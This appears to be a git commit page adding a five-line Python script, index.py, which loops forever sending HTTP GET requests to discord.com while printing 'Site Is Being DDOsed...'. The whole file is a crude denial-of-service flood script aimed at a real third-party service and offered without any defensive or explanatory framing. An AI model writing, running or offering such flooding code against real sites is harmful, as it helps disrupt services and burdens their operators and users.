Add index.py

This commit is contained in:
heckeralt 2024-09-27 08:36:59 -04:00
commit fe1f2edb0d
1 changed files with 5 additions and 0 deletions

5
index.py Normal file
View File

@ -0,0 +1,5 @@
import requests
while True:
# Your code here
print("Site Is Being DDOsed...")
requests.get("https://discord.com")